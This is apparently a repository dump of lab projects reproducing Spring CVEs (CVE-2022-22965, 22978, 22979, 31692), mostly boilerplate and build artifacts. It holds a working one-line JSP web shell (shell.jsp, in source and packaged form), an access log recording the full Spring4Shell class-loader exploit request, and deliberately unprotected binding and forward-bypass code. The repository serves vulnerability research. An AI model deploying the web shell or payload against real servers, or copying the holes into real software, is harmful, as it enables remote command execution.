https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22963/target/test-classes/com/example/demo/DemoApplicationTests.class -------------------------------------------------------------------------------- /CVE-2022-22965/src/main/java/org/axisx/SpringRCEDemo/GlobalFilter.java: -------------------------------------------------------------------------------- 1 | package org.axisx.SpringRCEDemo; 2 | 3 | import org.springframework.core.annotation.Order; 4 | import org.springframework.web.bind.WebDataBinder; 5 | import org.springframework.web.bind.annotation.ControllerAdvice; 6 | import org.springframework.web.bind.annotation.InitBinder; 7 | 8 | /* 9 | * One possible fix: globally filter out class-related binding parameters. The block below is commented out, so no filter is active in this build. NOTE(review): only the lowercase pattern "class.*" is listed, while the request recorded in this repository's shell3.jsp log uses the "Class." prefix; if disallowed-field matching is case-sensitive in the bundled Spring version (confirm), "Class.*", "*.class.*" and "*.Class.*" need listing as well. 10 | * */ 11 | //@ControllerAdvice 12 | //@Order(10000) 13 | //public class GlobalFilter { 14 | // 15 | // @InitBinder 16 | // public void setAllowFields(WebDataBinder dataBinder) { 17 | // dataBinder.setDisallowedFields(new String[]{"class.*"}); 18 | // } 19 | //} 20 | -------------------------------------------------------------------------------- /CVE-2022-22965/src/main/java/org/axisx/SpringRCEDemo/HelloController.java: -------------------------------------------------------------------------------- 1 | package org.axisx.SpringRCEDemo; 2 | 3 | import org.springframework.stereotype.Controller; 4 | import org.springframework.web.bind.annotation.RequestMapping; 5 | import org.springframework.web.bind.annotation.ResponseBody; 6 | /** MVC controller that exposes the /hello endpoint. */ 7 | @Controller 8 | public class HelloController { 9 | /** Returns "hello" + user.getName() + "!" as the response body. The User argument carries no binding annotation, so it is presumably populated from request parameters by Spring data binding (the logged request passes name and age this way); this class declares no @InitBinder that would limit which property paths may be bound. */ 10 | @RequestMapping("/hello") 11 | @ResponseBody 12 | public String hello(User user) { 13 | return "hello" + user.getName() + "!"; 14 | } 15 | } 16 | -------------------------------------------------------------------------------- /CVE-2022-22965/src/main/java/org/axisx/SpringRCEDemo/User.java: -------------------------------------------------------------------------------- 1 | package org.axisx.SpringRCEDemo; 2 | 3 | public class User { 4 | 5 | private String name; 
6 | 7 | private int age; 8 | 9 | public User() { 10 | } 11 | 12 | public String getName() { 13 | return name; 14 | } 15 | 16 | public void setName(String name) { 17 | this.name = name; 18 | } 19 | 20 | public int getAge() { 21 | return age; 22 | } 23 | 24 | public void setAge(int age) { 25 | this.age = age; 26 | } 27 | 28 | @Override 29 | public String toString() { 30 | return "User{" + 31 | "name='" + name + '\'' + 32 | ", age=" + age + 33 | '}'; 34 | } 35 | } 36 | -------------------------------------------------------------------------------- /CVE-2022-22965/src/main/webapp/index.jsp: -------------------------------------------------------------------------------- 1 | <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8" %> 2 | 3 | 4 | 5 | JSP - Hello World 6 | 7 | 8 |

<%= "Hello World!" %> 9 |

10 |
11 | Hello Servlet 12 | 13 | -------------------------------------------------------------------------------- /CVE-2022-22965/src/main/webapp/shell.jsp: -------------------------------------------------------------------------------- 1 | <%-- Web shell in the webapp root: hands the raw "cmd" request parameter to Runtime.exec with no authentication or input check. Detection: a JSP that feeds request.getParameter into Runtime.exec, or a .jsp file that appears under the web root outside a deployment; the same file is also packaged under target/SpringRCEDemo-1.0-SNAPSHOT/. --%> <%=Runtime.getRuntime().exec(request.getParameter("cmd"))%> 2 | -------------------------------------------------------------------------------- /CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT.war: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT.war -------------------------------------------------------------------------------- /CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/classes/org/axisx/SpringRCEDemo/GlobalFilter.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/classes/org/axisx/SpringRCEDemo/GlobalFilter.class -------------------------------------------------------------------------------- /CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/classes/org/axisx/SpringRCEDemo/HelloController.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/classes/org/axisx/SpringRCEDemo/HelloController.class -------------------------------------------------------------------------------- /CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/classes/org/axisx/SpringRCEDemo/User.class: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/classes/org/axisx/SpringRCEDemo/User.class -------------------------------------------------------------------------------- /CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/classes/org/magiczero/SpringRCEDemo/HelloController.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/classes/org/magiczero/SpringRCEDemo/HelloController.class -------------------------------------------------------------------------------- /CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/classes/org/magiczero/SpringRCEDemo/User.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/classes/org/magiczero/SpringRCEDemo/User.class -------------------------------------------------------------------------------- /CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/aspectjweaver-1.9.7.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/aspectjweaver-1.9.7.jar -------------------------------------------------------------------------------- /CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/slf4j-api-1.7.21.jar: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/slf4j-api-1.7.21.jar -------------------------------------------------------------------------------- /CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-aop-5.3.16.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-aop-5.3.16.jar -------------------------------------------------------------------------------- /CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-aspects-5.3.16.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-aspects-5.3.16.jar -------------------------------------------------------------------------------- /CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-beans-5.3.16.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-beans-5.3.16.jar -------------------------------------------------------------------------------- /CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-context-5.3.16.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-context-5.3.16.jar -------------------------------------------------------------------------------- 
/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-context-support-5.3.16.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-context-support-5.3.16.jar -------------------------------------------------------------------------------- /CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-core-5.3.16.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-core-5.3.16.jar -------------------------------------------------------------------------------- /CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-expression-5.3.16.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-expression-5.3.16.jar -------------------------------------------------------------------------------- /CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-jcl-5.3.16.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-jcl-5.3.16.jar -------------------------------------------------------------------------------- /CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-ldap-core-2.3.3.RELEASE.jar: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-ldap-core-2.3.3.RELEASE.jar -------------------------------------------------------------------------------- /CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-oxm-5.3.16.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-oxm-5.3.16.jar -------------------------------------------------------------------------------- /CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-security-core-5.4.2.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-security-core-5.4.2.jar -------------------------------------------------------------------------------- /CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-security-ldap-5.4.2.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-security-ldap-5.4.2.jar -------------------------------------------------------------------------------- /CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-test-5.3.16.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-test-5.3.16.jar 
-------------------------------------------------------------------------------- /CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-tx-5.2.11.RELEASE.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-tx-5.2.11.RELEASE.jar -------------------------------------------------------------------------------- /CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-web-5.3.16.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-web-5.3.16.jar -------------------------------------------------------------------------------- /CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-webmvc-5.3.16.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-webmvc-5.3.16.jar -------------------------------------------------------------------------------- /CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/shell3.jsp: -------------------------------------------------------------------------------- 1 | 10.128.5.250 - - [30/Mar/2022:03:57:25 +0800] "POST 
/SpringRCEDemo_war_exploded/hello?name=admin&age=2&Class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&Class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=3&Class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&Class.module.classLoader.resources.context.parent.pipeline.first.directory=/Users/dxy/Downloads/SpringRCEDemo/src/main/webapp/&poc=%3C%25out.write(%22This_AxisX%22);%25%3E HTTP/1.1" 200 11 2 | 10.128.5.250 - - [30/Mar/2022:03:57:26 +0800] "GET /SpringRCEDemo_war_exploded/shell3.jsp HTTP/1.1" 404 703 3 | 0:0:0:0:0:0:0:1 - - [30/Mar/2022:03:57:38 +0800] "GET /SpringRCEDemo_war_exploded/shell3.jsp HTTP/1.1" 404 703 4 | 0:0:0:0:0:0:0:1 - - [30/Mar/2022:03:57:41 +0800] "GET /SpringRCEDemo_war_exploded/shell3.jsp HTTP/1.1" 404 703 5 | -------------------------------------------------------------------------------- /CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/index.jsp: -------------------------------------------------------------------------------- 1 | <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8" %> 2 | 3 | 4 | 5 | JSP - Hello World 6 | 7 | 8 |

<%= "Hello World!" %> 9 |

10 |
11 | Hello Servlet 12 | 13 | -------------------------------------------------------------------------------- /CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/shell.jsp: -------------------------------------------------------------------------------- 1 | <%=Runtime.getRuntime().exec(request.getParameter("cmd"))%> 2 | -------------------------------------------------------------------------------- /CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/shell1.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/shell1.jsp -------------------------------------------------------------------------------- /CVE-2022-22965/target/classes/org/axisx/SpringRCEDemo/HelloController.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/classes/org/axisx/SpringRCEDemo/HelloController.class -------------------------------------------------------------------------------- /CVE-2022-22965/target/classes/org/axisx/SpringRCEDemo/User.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/classes/org/axisx/SpringRCEDemo/User.class -------------------------------------------------------------------------------- /CVE-2022-22965/target/maven-archiver/pom.properties: -------------------------------------------------------------------------------- 1 | artifactId=SpringRCEDemo 2 | groupId=org.magiczero 3 | version=1.0-SNAPSHOT 4 | -------------------------------------------------------------------------------- /CVE-2022-22965/target/maven-status/maven-compiler-plugin/compile/default-compile/createdFiles.lst: 
-------------------------------------------------------------------------------- 1 | org/axisx/SpringRCEDemo/User.class 2 | org/axisx/SpringRCEDemo/HelloController.class 3 | -------------------------------------------------------------------------------- /CVE-2022-22965/target/maven-status/maven-compiler-plugin/compile/default-compile/inputFiles.lst: -------------------------------------------------------------------------------- 1 | /Users/dxy/Downloads/SpringRCEDemo/src/main/java/org/axisx/SpringRCEDemo/HelloController.java 2 | /Users/dxy/Downloads/SpringRCEDemo/src/main/java/org/axisx/SpringRCEDemo/GlobalFilter.java 3 | /Users/dxy/Downloads/SpringRCEDemo/src/main/java/org/axisx/SpringRCEDemo/User.java 4 | -------------------------------------------------------------------------------- /CVE-2022-22965/target/maven-status/maven-compiler-plugin/testCompile/default-testCompile/inputFiles.lst: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/maven-status/maven-compiler-plugin/testCompile/default-testCompile/inputFiles.lst -------------------------------------------------------------------------------- /CVE-2022-22978/HELP.md: -------------------------------------------------------------------------------- 1 | # Getting Started 2 | 3 | ### Reference Documentation 4 | For further reference, please consider the following sections: 5 | 6 | * [Official Apache Maven documentation](https://maven.apache.org/guides/index.html) 7 | * [Spring Boot Maven Plugin Reference Guide](https://docs.spring.io/spring-boot/docs/2.7.4/maven-plugin/reference/html/) 8 | * [Create an OCI image](https://docs.spring.io/spring-boot/docs/2.7.4/maven-plugin/reference/html/#build-image) 9 | * [Spring Security](https://docs.spring.io/spring-boot/docs/2.7.4/reference/htmlsingle/#web.security) 10 | 11 | ### Guides 12 | The following guides illustrate how 
to use some features concretely: 13 | 14 | * [Securing a Web Application](https://spring.io/guides/gs/securing-web/) 15 | * [Spring Boot and OAuth2](https://spring.io/guides/tutorials/spring-boot-oauth2/) 16 | * [Authenticating a User with LDAP](https://spring.io/guides/gs/authenticating-ldap/) 17 | 18 | -------------------------------------------------------------------------------- /CVE-2022-22978/src/main/java/com/example/demo/Controller/AuthController.java: -------------------------------------------------------------------------------- 1 | package com.example.demo.Controller; 2 | 3 | import org.springframework.stereotype.Controller; 4 | import org.springframework.web.bind.annotation.GetMapping; 5 | import org.springframework.web.bind.annotation.PathVariable; 6 | import org.springframework.web.bind.annotation.ResponseBody; 7 | 8 | @Controller 9 | public class AuthController { 10 | @GetMapping("/") 11 | @ResponseBody 12 | public String index() { 13 | return "welcome"; 14 | } 15 | 16 | @GetMapping("/admin/{name}") 17 | @ResponseBody 18 | public String admin(@PathVariable String name) { 19 | return "welcome " + name; 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /CVE-2022-22978/src/main/java/com/example/demo/DemoApplication.java: -------------------------------------------------------------------------------- 1 | package com.example.demo; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | 6 | @SpringBootApplication 7 | public class DemoApplication { 8 | 9 | public static void main(String[] args) { 10 | SpringApplication.run(DemoApplication.class, args); 11 | } 12 | 13 | } 14 | -------------------------------------------------------------------------------- /CVE-2022-22978/src/main/resources/application.properties: -------------------------------------------------------------------------------- 1 | server.port=8085 2 | 
-------------------------------------------------------------------------------- /CVE-2022-22978/src/test/java/com/example/demo/DemoApplicationTests.java: -------------------------------------------------------------------------------- 1 | package com.example.demo; 2 | 3 | import org.junit.jupiter.api.Test; 4 | import org.springframework.boot.test.context.SpringBootTest; 5 | 6 | @SpringBootTest 7 | class DemoApplicationTests { 8 | 9 | @Test 10 | void contextLoads() { 11 | } 12 | 13 | } 14 | -------------------------------------------------------------------------------- /CVE-2022-22978/target/classes/application.properties: -------------------------------------------------------------------------------- 1 | server.port=8085 2 | -------------------------------------------------------------------------------- /CVE-2022-22978/target/classes/com/example/demo/Config/AuthConfig.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22978/target/classes/com/example/demo/Config/AuthConfig.class -------------------------------------------------------------------------------- /CVE-2022-22978/target/classes/com/example/demo/Controller/AuthController.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22978/target/classes/com/example/demo/Controller/AuthController.class -------------------------------------------------------------------------------- /CVE-2022-22978/target/classes/com/example/demo/DemoApplication.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22978/target/classes/com/example/demo/DemoApplication.class 
-------------------------------------------------------------------------------- /CVE-2022-22978/target/test-classes/com/example/demo/DemoApplicationTests.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22978/target/test-classes/com/example/demo/DemoApplicationTests.class -------------------------------------------------------------------------------- /CVE-2022-22979/HELP.md: -------------------------------------------------------------------------------- 1 | # Getting Started 2 | 3 | ### Reference Documentation 4 | For further reference, please consider the following sections: 5 | 6 | * [Official Apache Maven documentation](https://maven.apache.org/guides/index.html) 7 | * [Spring Boot Maven Plugin Reference Guide](https://docs.spring.io/spring-boot/docs/2.7.1/maven-plugin/reference/html/) 8 | * [Create an OCI image](https://docs.spring.io/spring-boot/docs/2.7.1/maven-plugin/reference/html/#build-image) 9 | * [Function](https://docs.spring.io/spring-cloud-function/docs/current/reference/html/spring-cloud-function.html) 10 | 11 | ### Additional Links 12 | These additional references should also help you: 13 | 14 | * [Various sample apps using Spring Cloud Function](https://github.com/spring-cloud/spring-cloud-function/tree/main/spring-cloud-function-samples) 15 | 16 | -------------------------------------------------------------------------------- /CVE-2022-22979/src/main/java/com/example/demo/LowercaseConfiguration.java: -------------------------------------------------------------------------------- 1 | package com.example.demo; 2 | 3 | import org.springframework.context.annotation.Bean; 4 | import org.springframework.context.annotation.Configuration; 5 | import reactor.core.publisher.Flux; 6 | 7 | import java.util.function.Function; 8 | 9 | @Configuration(proxyBeanMethods = false) 10 | public class 
LowercaseConfiguration { 11 | 12 | @Bean 13 | public Function, Flux> lowercase() { 14 | return flux -> flux.log().map(value -> new Bar(value.lowercase())); 15 | } 16 | 17 | } 18 | -------------------------------------------------------------------------------- /CVE-2022-22979/src/main/java/com/example/demo/TestController.java: -------------------------------------------------------------------------------- 1 | package com.example.demo; 2 | 3 | import org.springframework.web.bind.annotation.RequestMapping; 4 | import org.springframework.web.bind.annotation.RestController; 5 | 6 | @RestController 7 | public class TestController { 8 | @RequestMapping("/") 9 | String home() { 10 | return "hello axisx"; 11 | } 12 | } 13 | -------------------------------------------------------------------------------- /CVE-2022-22979/src/main/resources/application.properties: -------------------------------------------------------------------------------- 1 | server.port=8089 2 | server.address=10.128.5.250 3 | 4 | spring.cloud.function.definition=test1|test2|test3|test4 -------------------------------------------------------------------------------- /CVE-2022-22979/src/test/java/com/example/demo/DemoApplicationTests.java: -------------------------------------------------------------------------------- 1 | package com.example.demo; 2 | 3 | import org.junit.jupiter.api.Test; 4 | import org.springframework.boot.test.context.SpringBootTest; 5 | 6 | @SpringBootTest 7 | class DemoApplicationTests { 8 | 9 | @Test 10 | void contextLoads() { 11 | } 12 | 13 | } 14 | -------------------------------------------------------------------------------- /CVE-2022-22979/target/classes/application.properties: -------------------------------------------------------------------------------- 1 | server.port=8089 2 | server.address=10.128.5.250 3 | 4 | spring.cloud.function.definition=test1|test2|test3|test4 -------------------------------------------------------------------------------- 
/CVE-2022-22979/target/classes/com/example/demo/Bar.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22979/target/classes/com/example/demo/Bar.class -------------------------------------------------------------------------------- /CVE-2022-22979/target/classes/com/example/demo/DemoApplication.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22979/target/classes/com/example/demo/DemoApplication.class -------------------------------------------------------------------------------- /CVE-2022-22979/target/classes/com/example/demo/Foo.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22979/target/classes/com/example/demo/Foo.class -------------------------------------------------------------------------------- /CVE-2022-22979/target/classes/com/example/demo/LowercaseConfiguration.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22979/target/classes/com/example/demo/LowercaseConfiguration.class -------------------------------------------------------------------------------- /CVE-2022-22979/target/classes/com/example/demo/TestController.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22979/target/classes/com/example/demo/TestController.class -------------------------------------------------------------------------------- 
/CVE-2022-22979/target/test-classes/com/example/demo/DemoApplicationTests.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22979/target/test-classes/com/example/demo/DemoApplicationTests.class -------------------------------------------------------------------------------- /CVE-2022-31692/HELP.md: -------------------------------------------------------------------------------- 1 | # Getting Started 2 | 3 | ### Reference Documentation 4 | For further reference, please consider the following sections: 5 | 6 | * [Official Apache Maven documentation](https://maven.apache.org/guides/index.html) 7 | * [Spring Boot Maven Plugin Reference Guide](https://docs.spring.io/spring-boot/docs/2.7.4/maven-plugin/reference/html/) 8 | * [Create an OCI image](https://docs.spring.io/spring-boot/docs/2.7.4/maven-plugin/reference/html/#build-image) 9 | * [Spring Security](https://docs.spring.io/spring-boot/docs/2.7.4/reference/htmlsingle/#web.security) 10 | 11 | ### Guides 12 | The following guides illustrate how to use some features concretely: 13 | 14 | * [Securing a Web Application](https://spring.io/guides/gs/securing-web/) 15 | * [Spring Boot and OAuth2](https://spring.io/guides/tutorials/spring-boot-oauth2/) 16 | * [Authenticating a User with LDAP](https://spring.io/guides/gs/authenticating-ldap/) 17 | 18 | -------------------------------------------------------------------------------- /CVE-2022-31692/src/main/java/com/example/demo/Controller/AuthController.java: -------------------------------------------------------------------------------- 1 | package com.example.demo.Controller; 2 | 3 | import org.springframework.stereotype.Controller; 4 | import org.springframework.web.bind.annotation.GetMapping; 5 | import org.springframework.web.bind.annotation.PathVariable; 6 | import org.springframework.web.bind.annotation.ResponseBody; 7 | 8 | 
@Controller 9 | /** Lab controller for the CVE-2022-31692 sample project: three GET handlers. admin() and index() write their return value as the response body; redirect() returns a view name. No access rule is declared in this class. NOTE(review): the rules presumably live in Config/AuthConfig, whose source is not shown on this page. */ public class AuthController { 10 | @GetMapping("/admin") 11 | @ResponseBody 12 | public String admin() { 13 | return "admin page"; 14 | } 15 | 16 | @GetMapping("/") 17 | @ResponseBody 18 | public String index() { 19 | return "index"; 20 | } 21 | 22 | /** Returns a view name rather than a body, since there is no @ResponseBody here. Despite the method name no HTTP redirect is issued: the forward: prefix makes Spring MVC re-dispatch the request inside the server to /admin, so the only request the client sends is GET /forward. NOTE(review): a URL rule written for /admin protects this path only if the security filter chain also runs on FORWARD dispatches and applies an authorization rule to them. The application.properties of this project lists forward among spring.security.filter.dispatcher-types, which covers the first half; confirm the second half against AuthConfig (not shown). */ @GetMapping("/forward") 23 | public String redirect() { 24 | return "forward:/admin"; 25 | } 26 | } 27 | -------------------------------------------------------------------------------- /CVE-2022-31692/src/main/java/com/example/demo/DemoApplication.java: -------------------------------------------------------------------------------- 1 | package com.example.demo; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | 6 | @SpringBootApplication 7 | public class DemoApplication { 8 | 9 | public static void main(String[] args) { 10 | SpringApplication.run(DemoApplication.class, args); 11 | } 12 | 13 | } 14 | -------------------------------------------------------------------------------- /CVE-2022-31692/src/main/resources/application.properties: -------------------------------------------------------------------------------- 1 | server.port=8085 2 | spring.security.filter.dispatcher-types = request, error, async, forward, include 3 | -------------------------------------------------------------------------------- /CVE-2022-31692/src/test/java/com/example/demo/DemoApplicationTests.java: -------------------------------------------------------------------------------- 1 | package com.example.demo; 2 | 3 | import org.junit.jupiter.api.Test; 4 | import org.springframework.boot.test.context.SpringBootTest; 5 | 6 | @SpringBootTest 7 | class DemoApplicationTests { 8 | 9 | @Test 10 | void contextLoads() { 11 | } 12 | 13 | } 14 | -------------------------------------------------------------------------------- /CVE-2022-31692/target/classes/application.properties:
